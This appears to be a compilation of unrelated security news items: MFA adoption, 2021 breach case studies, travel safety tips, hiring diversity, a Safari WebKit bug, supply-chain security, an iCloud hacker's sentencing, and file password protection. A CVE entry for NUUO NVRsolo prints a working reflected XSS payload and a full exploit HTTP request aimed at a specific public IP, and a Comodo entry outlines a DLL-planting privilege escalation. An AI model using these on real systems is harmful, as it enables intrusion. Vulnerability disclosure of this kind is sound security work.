While there's an immediate need to improve MFA adoption, it's also critical to move to more advanced and secure passwordless frameworks, including biometrics. (Part 1 of 2)

The fact that we continue to rely on passwords this deep into the digital age is more than a bit jarring. These alphanumeric scraps, the equivalent of digital skeleton keys, once served as a valuable tool. Unfortunately, passwords are now far more trouble than they're worth. They provide little protection against identity theft, breaches, and myriad other problems.

Yet completely ditching passwords is out of the question — at least for now. While they may rank as an almost total security fail and a bane for everyone, they remain an entrenched standard. Consequently, multifactor authentication (MFA) has become a necessity, but it too presents challenges bordering on outright problems.

This is the first of a two-part series about how businesses can adopt stronger and better authentication methods. While there's an immediate need to boost MFA adoption, it's also critical to move to more advanced and secure passwordless frameworks, including those that use biometrics.

**Embarrassment of Riches**

As with every technology, an accumulation of solutions eventually becomes a new problem. Most organizations and many consumers recognize the need to move beyond password-only authentication. Yet two-factor authentication (2FA) and even many MFA techniques were never designed for today's sophisticated digital frameworks.

"When you log into six different systems during the day and each of them uses a different method ... you wind up with two-factor authentication PTSD," says Michael Engle, co-founder and chief security officer at 1Kosmos. "You spend a significant time fetching codes and launching apps."

The mix of methods — including time-based one-time password (TOTP), SMS and email 2FA, push-based 2FA, universal second factor (U2F) tokens, WebAuthn, and desktop agents — introduce an often-confusing array of options for both companies and consumers. Making matters worse, they deliver varying levels of protection, and most people aren't equipped to understand the pros and cons. For instance, widely used SMS and email codes are easily intercepted or breached when a crook has access to a device. Toolkits that facilitate man-in-the-middle attacks and other password exploits are now widely available on sites such as GitHub.

Consumer and enterprise fatigue is at a breaking point. And while significantly better MFA and passwordless systems are taking shape — Apple, Google, and Microsoft have announced they are moving to passwordless sign-ins built on the FIDO2 standard — organizations continue to struggle with adoption.

Design, usability, and functionality are all critical. There's a need to convince people to move beyond a basic password and adopt MFA, but it's also critical to deploy higher grade MFA methods while moving to passwordless. 

"This requires improved UX and education. There's a need for the process to be seamless," says Don Tait, a senior analyst at Omdia Consulting.

**Risky Business**

It's a startling and entirely disturbing fact: Despite a seemingly endless string of hacks, attacks, breaches, and breakdowns — 81% of hacking-related breaches are caused by password issues — only 29% of consumers believe that the inconvenience of 2FA is always worth the security trade-off. About 36% are willing to use 2FA in some cases, depending on the importance of the account.

The reasons for this reticence are at least partly rooted in the nature of today's online world. For better or worse, people expect Web pages to load instantaneously, and they seek access to accounts without any latency — even when dozens of APIs and servers around the world are required for a transaction. Remarkably, one study conducted by Microsoft found that the average person only has an attention span of approximately eight seconds.

Yet it's also clear that MFA frameworks can be a big hassle. Oftentimes, it's necessary to request a text code or pull out a phone and open an authenticator app from Google or Microsoft and type in a code. Meanwhile, physical tokens, such as YubiKey, offer stellar security — but they can be difficult to set up and use.

MFA participation is ticking up due to the pandemic and ominous warnings about the risks of relying on a password only; Okta found that MFA adoption rose by about 80% during the early stages of the pandemic. However, attacks are escalating and becoming more sophisticated. The net result is a relative move backward.

"There are too many companies giving too little thought to how to implement more advanced MFA and passwordless systems," says Jasson Casey, CTO for authentication vendor Beyond Identity. "You can't build a security architecture without considering design and usability. As the level of friction goes up, participation goes down."

These issues unfold in several ways. Design elements may hide MFA options or deliver confusing instructions for how to set it up. They sometimes provide confusing or ominous warnings that frighten users, or a site or service doesn't communicate the value of using MFA. Frequently, users don't see any compelling reason to adopt this additional layer of security.

"People turn to digital services because they're looking for ease of use and convenience," says Kalev Rundu, senior product manager at authentication firm Veriff. MFA must not be any different. It must fit seamlessly with the broader digital interaction and deliver a clear advantage or other forms of authentication.

**Designs on Security**

Gaining buy-in is critical. Researchers from the Max Planck Institute for Security and Privacy; the University of California, San Diego; and Facebook found that one of the keys to convincing people to turn on MFA is to present the decision as a personal empowerment choice. This might include a message like, "You can increase your protection against account hacking" or "Protect your account, pages and friends."

When researchers tested this personal responsibility approach with accompanying buttons on Facebook, it led to an uptick in MFA adoption by 33% among 622,419 participants. When users viewed a message about the advantages of being protected, they were 28% more likely to adopt MFA. On the other hand, the corporate responsibility button didn't prompt any change in behavior.

Another technique that boosts adoption revolves around an incentive or a reward — an approach that has already gained traction within gaming platforms like Fortnight and World of Warcraft. In 2019, a group of researchers from the University of Bonn and Leibniz University Hannover in Germany found that even a small incentive, such as an upgraded avatar or another small gift, can push numbers up.

Colors, placement, and design elements also matter. Delivering the request at the right moment — without interrupting the flow of an interaction or transaction — is crucial. 

"It must be so easy that doing it for the first time has nearly no friction," 1Kosmos' Engle says. QR codes and push-to-app authentications can help, especially when a user can authorize the sign-in from a separate authorized device.

Still, none of these approaches are seamless — and they aren't bulletproof. The future of MFA and full passwordless systems lies in biometrics, FIDO2, and emerging systems that not only authenticate to an account on a device, but also verify a person's identity. 

"A new era of authentication is emerging," Omdia's Tait says.

_In part 2, Dark Reading takes a look at the rapidly evolving passwordless space and what companies need to do to stamp out passwords once and for all._

Evolving Beyond the Password: It's Time to Up the Ante

Comodo Antivirus 12.2.2.8012 has a quarantine flaw that allows privilege escalation. To escalate privilege, a low-privileged attacker can use an NTFS directory junction to restore a malicious DLL from quarantine into the System32 folder.

CVE-2022-34008: Download Free Antivirus Software | Get Complete PC Virus Protection

NUUO Network Video Recorder NVRsolo v03.06.02 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via login.php.

    "><script>alert("XSS")</script><"
    

    POST /login.php HTTP/1.1
    Host: 218.253.76.122:8000
    Content-Length: 45
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://218.253.76.122:8000
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: "><script>alert("XSS")</script><"
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: lang=en; PHPSESSID=b630e0a3b454ae69c6aacbe257435b55
    Connection: close
    
    language=11111&user=111&pass=222&submit=Login

CVE-2022-33119: nuuo-xss/README.md at main · badboycxcc/nuuo-xss

In this post, we break down 5 times hackers used security vulnerabilities in 2021 to attack governments and businesses.
The post Security vulnerabilities: 5 times that organizations got hacked appeared first on Malwarebytes Labs.

Businesses and governments these days are relying on dozens of different Software-as-a-Service (SaaS) applications to run their operations — and it’s no secret that hackers are always looking for security vulnerabilities in them to exploit.

According to research by BetterCloud, the average company with 500 to 999 employees uses about 93 different SaaS applications, with that number rising to 177 for companies with over 1000 employees.

Coupled with the fact that vendors release thousands of updates each year to patch security vulnerabilities in their software, it’s not surprising that businesses and governments are struggling to keep up with the volume of security vulnerabilities and patches.

And lo and behold, despite the best efforts of governments and businesses around the globe, hackers still managed to exploit multiple security vulnerabilities in 2021.

In this post, we’ll take a look at five times governments and businesses got hacked thanks to security vulnerabilities in 2021.

**1.   APT41 exploits Log4Shell vulnerability to compromise at least two US state governments**

First publicly announced in early December 2021, Log4shell (CVE-2021-44228) is a critical security vulnerability in the popular Java library Apache Log4j 2. The vulnerability is simple to execute and enables attackers to perform remote code execution.

A patch for Log4Shell was released on 9 December 2021, but within hours of the initial December 10 2021 announcement, hacker groups were already racing to exploit Log4Shell before businesses and governments could patch it — and at least one of them was successful.

Shortly after the advisory, the Chinese state-sponsored hacking group APT41 exploited Log4Shell to compromise at least two US state governments, according to research from Mandiant. Once they gained access to internet-facing systems, APT41 began a months-long campaign of reconnaissance and credential harvesting.

**2.  North Korean government backed-groups exploit Chrome zero-day vulnerability**

On February 10 2022, Google’s Threat Analysis Group (TAG) discovered that two North Korean government backed-groups exploited a vulnerability (**CVE-2022-0609**) in Chrome to attack over 250 individuals working for various media, fintech, and software companies.

The activities of the two groups have been tracked as Operation Dream Job and AppleJeus, and both of them used the same exploit kit to collect sensitive information from affected systems.

How does it work, you ask? Well, hackers exploited a use-after-free (UAF) vulnerability in the Animation component of Chrome — which, just like Log4Shell, allows hackers to perform remote code execution.

**3.  Hackers infiltrate governments and companies with ManageEngine ADSelfService Plus vulnerability**

From September 17 through early October, hackers successfully compromised at least nine companies and 370 servers by exploiting a vulnerability **(CVE-20****2****1-40539)** in ManageEngine ADSelfService Plus, a self-service password management and single sign-on solution.

So, what happens after hackers exploited this vulnerability? You guessed it — remote code execution. Specifically, hackers uploaded a payload to a victims network that installed a webshell, a malicious script that grants hackers a persistent gateway to the affected device.

From there, hackers moved laterally to other systems on the network, exfiltrated any files they pleased, and even stole credentials.

**4.  Tallinn-based hacker exploits Estonian government platform security vulnerabilities**

In July 2021, Estonian officials announced that a Tallinn-based male had gained access to KMAIS, Estonia’s ID-document database, where he downloaded the government ID photos of 286,438 Estonians.

To do this, the hacker exploited a vulnerability in KMAIS that allowed him to obtain a person’s ID photo using queries. Specifically, KMAIS did not sufficiently check the validity of the query received — and so, using fake digital certificates, the suspect could download the photograph of whoever he was pretending to be.

**5.  Russian hackers exploit Kaseya security vulnerabilities**

Kaseya, a Miami-based software company, provides tech services to thousands of businesses over the world — and on July 2 2021, Kaseya CEO Fred Voccola had an urgent message for Kaseya customers: shut down your servers immediately.

The urgency was warranted. Over 1,500 small and midsize businesses had just been attacked, with attackers asking for $70 million in payment.

A Russian-based cybergang known as REvil claimed responsibility for the attack. According to Hunteress Labs, REvil exploited a zero-day (CVE-2021-30116) and performed an authentication bypass in Kaseya’s web interface — allowing them to deploy a ransomware attack on MSPs and their customers.

**Organizations need a streamlined approach to vulnerability assessment**

Hackers took advantage of many security vulnerabilities in 2021 to breach an array of governments and businesses.

As we broke down in this article, hackers can range from individuals to whole state-sponsored groups — and we also saw how vulnerabilities themselves can appear in just about any piece of software regardless of the industry.

And while some vulnerabilities are certainly worse than others, the sheer volume of vulnerabilities out there makes it difficult to keep up with the volume of security patches. With the right vulnerability management and patch management, however, your organization can find (and correct) weak points that malicious hackers, viruses, and other cyberthreats want to attack.

Want to learn more about different vulnerability and patch management tools? Visit our Vulnerability and Patch Management page or read the solution brief.

Security vulnerabilities: 5 times that organizations got hacked

Vacationing has never been more welcome. But as you plan your itinerary, make sure your devices are secure and your data stays private.
The post Internet Safety Month: 7 tips for staying safe online while on vacation appeared first on Malwarebytes Labs.

Going on vacation has never been more talked about and anticipated. I mean—for many of us, it’s been a while.

But before you get lost in dreamy thoughts of sun, sea, and sand, you might want to set aside some time to plan on how to keep your devices, and your data, safe while you are relaxing

**Your devices need some prepping, too**

Before anything else, know which devices you’ll bring and which ones you’ll leave at home. Then make backups of the files in them.

This is also the perfect time to look deeper into what’s on your devices, especially if you haven’t done any spring cleaning due to busyness. So update those apps that need updating and uninstall those that waste space; scan your devices with a trusty malware scanner, and change any duplicate passwords. Then follow these tips:

**7 security and privacy tips that fit in your pocket**

**Ensure your devices have the “Find My Device” feature enabled.** This feature isn’t just limited to Apple products, and can really help if you lose your device. You can remotely wipe a device if you lose it or even put a message on the screen with contact details in case it is found.

**Be mindful of seasonal scams.** Such scams may arrive via email, SMS, or social media. If a service offers rates that are too good to be true, asks for an upfront fee, or demands payments to be wired, avoid it.

**Use 2FA.** Make sure you lock your accounts behind two-factor authentication (2FA). This additional security measure makes them harder to compromise should someone get hold of your login details.

**Turn off Bluetooth connectivity.** Many people forget Bluetooth is there. As a rule of thumb, remove it if you don’t use it. But if you can’t, disable it when it’s not in use.

**Leave your device in the hotel’s safe.** Hotel safes are there to keep anything of value safe. This includes your devices. When you’re not using a device, keep it in the safe—and remember the pin code!

**Refrain from posting on social media about your vacation.** This is good practice _before_ you leave as well. You don’t want people knowing that your home will be empty, so save posting about your getaway until you are back home.

**Feel free to use a VPN.** Hotel and airport Wi-Fi is safer now than years ago, thanks to HTTPS everywhere. But if you still can’t shake the feeling of being “exposed,” use a VPN you trust. Malwarebytes has one.

Internet Safety Month: 7 tips for staying safe online while on vacation

Companies need to fill some of the 3.5 million empty cybersecurity seats with workers who bring different experiences, perspectives, and cultures to the table. Cut a few doors and windows into the security hiring box.

In the past year, we've had to grapple with the impact of a quickly growing threat landscape. Debilitating cyberattacks against our critical infrastructure, threats against our already weak supply chains, and the continued ripple effect of the Log4j incident have fueled the need for more intentional investment in security tools and services.

With cybercrime growing, it's no secret that there is a dire need for cybersecurity talent globally, so let's break down what the industry looks like for a moment. For security spots already filled, only 4% are Hispanic, 9% are Black, and 24% identify as women, according to the Aspen Institute. There is a clear picture painted for us: Not only do we need to fill the empty seats, but we need to fill them with workers who are bringing different experiences, perspectives, and cultures to the table.

**Unlocking Innovation with Diversity**

So, why does this matter? Diversity and inclusion have become notorious for being buzzwords within organizations, with companies increasingly touting their respective campaigns, and programs around diversity efforts.

In every industry — but particularly in an industry like cybersecurity that is changing by the minute — we need the brightest ideas, the most well-rounded teams, and the most creative practitioners. Having diverse thoughts, backgrounds, and experiences leads to better and more informed decision-making. At SPHERE, the diversity of our team has improved our ability to overcome business challenges. Our array of talent has also enhanced our culture, reduced turnover, and led to a greater sense of satisfaction throughout the organization.

Another key reason diversity should be a vital thread in the fabric of your cybersecurity business is that it's exactly what the new wave of job seekers is looking for.

Millennials now make up more than one of every three people employed in the United States. And data shows that this powerful group is no longer satisfied with the way workplace benefits and culture have traditionally been measured. According to Weber Shandwick, 47% of millennials consider diversity and inclusion an important factor in considering a new job, 14% more than Gen-Xers. Cybersecurity organizations and teams are the backbone of our infrastructure and daily activities, and thus should be communicating their values, beliefs, and missions so that they are attracting the most ambitious, creative professionals.

**A Tool Set for Progress**

We must take this information and run with it, strategizing ways to nurture a healthy pipeline of diverse talent. The first and most important step to doing this is being confident that there is a problem but that your organization is more than capable of solving it. To begin, recognize that there are many technical and nontechnical roles available in security. The points of entry into this industry are vast and go beyond engineering — from governance, risk, compliance, and IT to business development, product marketing, and communications.

Secondly, partner with local colleges and universities, tapping into educational programs outside of engineering or software development, as well. Organizations such as Cyversity, Women in Cybersecurity (WiCyS), and Women in Security and Privacy (WISP) are doing phenomenal work opening the door of opportunity to populations historically locked out.

Last, and in my opinion one of the most important strategies, is to leverage your networks to initiate open conversations about the work you are doing. As a woman founder and CEO of a cybersecurity company, I am committed to using the platform and resources I have to nurture the next generation of diverse cybersecurity professionals.

We can't sit back and watch as the talent and skills gap within our industry widens. At SPHERE, we've set out to empower young women to achieve greatness in the cybersecurity industry. As such, we're launching a program, SP(HER)E, that partners established women leaders with younger women who are new or are looking to break into the industry.

**The Way Forward — Perspectives From a Woman Leader**

I've faced a fair share of challenges being a woman leader in this space. When I started my business, I was a young woman launching a niche company in a male-dominated industry, and there was doubt around my ability due to inexperience combined with the unfortunate reality that some folks tend to consider women less capable than men. I understand that this is an issue and a gap we can't fill overnight. But we _can_ commit to daily, small steps that will compound into meaningful results in the next few years.

The cybercriminal landscape is only getting more sophisticated, cunning, and large. Hiring diverse talent – and sustaining this progress with investments into professional development and retention – are the first steps toward a well-equipped and thriving cybersecurity team!

The Cybersecurity Diversity Gap: Advice for Organizations Looking to Thrive

A security flaw in Apple Safari that was exploited in the wild earlier this year was originally fixed in 2013 and reintroduced in December 2016, according to a new report from Google Project Zero.
The issue, tracked as CVE-2022-22620 (CVSS score: 8.8), concerns a case of a use-after-free vulnerability in the WebKit component that could be exploited by a piece of specially crafted web content to

A security flaw in Apple Safari that was exploited in the wild earlier this year was originally fixed in 2013 and reintroduced in December 2016, according to a new report from Google Project Zero.

The issue, tracked as CVE-2022-22620 (CVSS score: 8.8), concerns a case of a use-after-free vulnerability in the WebKit component that could be exploited by a piece of specially crafted web content to gain arbitrary code execution.

In early February 2022, Apple shipped patches for the bug across Safari, iOS, iPadOS, and macOS, while acknowledging that it "may have been actively exploited."

"In this case, the variant was completely patched when the vulnerability was initially reported in 2013," Maddie Stone of Google Project Zero said. "However, the variant was reintroduced three years later during large refactoring efforts. The vulnerability then continued to exist for 5 years until it was fixed as an in-the-wild zero-day in January 2022."

While both the 2013 and 2022 bugs in the History API are essentially the same, the paths to trigger the vulnerability are different. Then subsequent code changes undertaken years later revived the zero-day flaw from the dead like a "zombie."

Stating the incident is not unique to Safari, Stone further stressed taking adequate time to audit code and patches to avoid instances of duplicating the fixes and understanding the security impacts of the changes being carried out.

"Both the October 2016 and the December 2016 commits were very large. The commit in October changed 40 files with 900 additions and 1225 deletions. The commit in December changed 95 files with 1336 additions and 1325 deletions," Stone noted.

"It seems untenable for any developers or reviewers to understand the security implications of each change in those commits in detail, especially since they're related to lifetime semantics."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google Researchers Detail 5-Year-Old Apple Safari Vulnerability Exploited in the Wild

This week on Lock and Code, we speak with Kim Lewandowski about what steps we can take to secure the software supply chain. 
The post Securing the software supply chain, with Kim Lewandowski: Lock and Code S03E13 appeared first on Malwarebytes Labs.

At the start of the global coronavirus pandemic, nearly everyone was forced to learn about the “supply chain.” Immediate stockpiling by an alarmed (and from a smaller share, opportunistic) public led to an almost overnight disappearance of hand sanitizer, bottled water, toilet paper, and face masks.

In time, those items returned to stores. But then a big ship got stuck in the Suez, and once again, we learned even more about the vulnerability of supply chains. They can handle little stress. They can be derailed with one major accident. They spread farther than we know.

While the calamity in the canal involved many lessons, there was another story in late 2020 that required careful study in cyberspace—an attack on the digital supply chain.

That year, attackers breached a network management tool called Orion, which is developed by the Texas-based company SolarWinds. Months before the attack was caught, the attackers swapped malicious code into a legitimately produced security update from SolarWinds. This malicious code gave the attackers a backdoor into every Orion customer who both downloaded and deployed the update and who had their servers connected online. Though the initial number of customers who downloaded the update was about 18,000 companies, the number of customers infected with the attackers’ malware was far lower, somewhere around 100 companies and about a dozen government agencies.

This attack, which did involve a breach of a company, had a broader focus—the many, many clients of that one company. This was an attack on the software supply chain, and since that major event, similar attacks have happened again and again.

Today, on the Lock and Code podcast with host David Ruiz, we speak with Kim Lewandowski, founder and head of product at Chainguard, about the software supply chain, its vulnerabilities, and how we can fix it.

> “Our software supply chains are as brittle and sort of filled with weaknesses, similar to a physical supply chain. When you think about every step of the path from when a developer starts writing software all the way to where it’s pushed to production, or where end user is using it, there’s different attack vectors across that entire path.”
> 
> Kim Lewandowski, founder, head of product, Chainguard Inc.

Tune in to hear about why the software supply chain is so difficult to secure, what is at stake if we continue to ignore the problem, and what steps we can take today—and tomorrow—to ensure that future software builds are secure and trustworthy.

This video cannot be displayed because your _Functional Cookies_ are currently disabled.

To enable them, please visit our _privacy policy_ and search for the Cookies section. Select _“Click Here”_ to open the Privacy Preference Center and select _“Functional Cookies”_ in the menu. You can switch the tab back to _“Active”_ or disable by moving the tab to _“Inactive.”_ Click _“Save Settings.”_

You can find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

****Show notes, resources, and credits**_:_**

Kubernetes diagram:

https://user-images.githubusercontent.com/622577/170547400-ef9e2ef8-e35b-46df-adee-057cbce847d1.svg

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

Securing the software supply chain, with Kim Lewandowski: Lock and Code S03E13

By Deeba Ahmed
The hacker was arrested in 2021 for breaching Apple iCloud accounts and stealing more than 620,000 private images…
This is a post from HackRead.com Read the original post: 9 Years Jail for iCloud Phishing Scam Hacker Who Stole Nude Photos

****The hacker was arrested in 2021 for breaching Apple iCloud accounts and stealing more than 620,000 private images and 9,000 videos of young females.****

Hao Kuo Chi, a 41-year-old hacker from California, has been sentenced to nine years in prison. The sentence was announced on Thursday for breaching iCloud accounts, said the US Attorney’s Office for the Central District of Florida.

US District Judge Kathryn Kimball Mizelle sentenced Hao Kuo Chi to nine years in federal prison on conspiracy and computer fraud charges. The accused pleaded guilty in October 2021.

**Background Story**

As Hackread.com previously reported, Chi stole people’s nude videos and photos of young females and shared them with conspirators. He used the online moniker “icloudripper4you” to hack thousands of iCloud accounts. He was arrested for breaching Apple iCloud accounts and stealing more than 620,000 private images and 9,000 videos of young females.

The La Puente, California resident admitted impersonating Apple customer support staff and carrying out iCloud phishing scams to trick the victims into giving away their Apple IDs and passwords.

**The “Terror” Campaign**

In the DoJ’s press release, authorities referred to Chi’s illicit activities as a terror campaign, sharing nude images/videos of innocent users on his website and calling the stolen content his “wins.” Furthermore, he illegally hacked into iCloud accounts of approximately 4700 individuals and shared the content with conspirators on 300 occasions.

US Attorney Roger Handberg stated that Chi victimized “hundreds of women across the country” and made them fearful for their reputation and safety because some conspirators leaked those images online.

> “This man led a terror campaign from his computer, causing fear and distress to hundreds of victims. The FBI is committed to protecting the American people by exposing these cybercriminals and bringing them to justice.”
> 
> David Walker, FBI Tampa Division Special Agent in Charge.

Court documents reveal that Chi’s campaign was spread over Anon-IB for several years. This now-defunct website served as an image-sharing platform where users were encouraged to post sexually explicit and nude photos.

Chi used an undisclosed foreign, end-to-end encrypted email service for sharing images with his conspirators. When Anon-IB was active, Chi collected 3.5TB of data from 500 victims, which he stored in physical devices and iCloud.

**More iCloud Hacks and Flaws**

*   55 Apple vulnerabilities risked iCloud account takeover, data theft
*   Apple users hit with KYC Validation/iCloud ID review phishing scam
*   iCloud Glitch? Woman buys iPhone, finds contact details of top celebs
*   New iCloud Phishing Scam steals credit card data, access device’ camera
*   MetaMask Asks Users to Disable iCloud Backup for Wallet After User Lost $650k

9 Years Jail for iCloud Phishing Scam Hacker Who Stole Nude Photos

Put a digital lock on your most important data.

You never know when one of your files might reach someone it wasn't intended to reach—perhaps through an email forward, a USB stick left behind on a desk, or maybe even an unauthorized user accessing your computer.

Should that happen, password protection is all that stands between your data and the people whom you don't want to see it. It's an extra layer of security you can add to your most sensitive files without too much trouble.

How you go about this will depend on the software you're using to create the file in the first place. Some applications have password protection features built in, while in other cases you'll need to lock up your files using a different method.

Microsoft Word, Excel, and PowerPoint

Adding a password to a document in Word.

Microsoft Word via David Nield

In Word, Excel, or PowerPoint for Windows, open the file you want to protect with a password, then select **File** and **Info**. You should see a Protect option at the top of the next list: Click this button, choose **Encrypt with Password**, and type out your password.

Passwords can be up to 15 characters long and are case-sensitive, so double-check what you're typing in. If you forget the password for a document, spreadsheet, or presentation, you won't be able to get back into it—you'll have to start again from scratch.

If you're using Office on macOS, the process is slightly different: Open the **Review** tab in the ribbon menu at the top, then click the **Protect** button to enter a password. (The button will be labeled slightly differently depending on which program you're in.)

Google Docs, Sheets, and Slides

Sharing a document in Google Docs.

Google Docs via David Nield

There's no password protection feature as such in Google Drive, because your files are already protected by a password: The password linked to your Google account that you use to log in and view your documents, spreadsheets, and presentations.

If you choose to share a file from Google Docs, Sheets, or Slides—via the big **Share** button in the top-right corner when you're working on something—you can either invite specific users to see it (via their email addresses) or generate a link that anyone can use.

We'd recommend the former option (inviting individual users) for maximum security. This means they'll need to log in with their own Google account password—another layer of password protection—before being able to view the file you've shared.

Apple Pages, Numbers, and Keynote

Setting a password on a document in Apple Pages.

Apple Pages via David Nield

If it's the Apple office applications that you're using, the process of adding a password couldn't be much easier. With the file open in Pages, Numbers, or Keynote, select **File** and then **Set Password** to choose and apply your password.

The same warning applies as it does with Microsoft Office—if you can't remember your password then you're not going to be able to get back into your document, spreadsheet, or presentation (otherwise hackers would be able to get in as well).

Note the **Open with Touch ID** checkbox on the password dialog. This gives you the option of using a Touch ID–enabled keyboard on macOS to open your own protected files, saving you the trouble of typing out a password each time.

Protecting Other Files

Adding password protection to a folder on Dropbox.

Dropbox via David Nield

We can't cover every application out there in terms of password protection, but if you dig around in the programs that you're using you might find that they offer this form of additional security while saving files.

If not, you've still got a few options. Keeping files in cloud storage lockers (like Google Drive) is one option: The act of sharing files on these services usually requires a username and password to log in, so your files are kept safe in that way.

Sometimes there are extra features. In the case of Dropbox, for example, on the folder-sharing pane on the web, you can click **Settings** and then change **Who has access** to **People with password**—so both a unique URL and a password are required for access.

If you need another option, create a password-protected archive containing the file or files that you need to keep safe. 7-Zip is a free tool for Windows that is able to build password-protected archives, for example.

Should your files be on an external hard drive, you can encrypt the entire drive and add a password to guard against unwanted access: In Windows, right-click on the drive in File Explorer and choose **Turn on BitLocker**; on macOS, go through the Disk Utility.

Third-party applications such as VeraCrypt (free for both Windows and macOS) are also able to encrypt drives for you, adding password protection at the same time. It's a sensible choice if you're putting sensitive data on a portable storage device.

Tag

#apple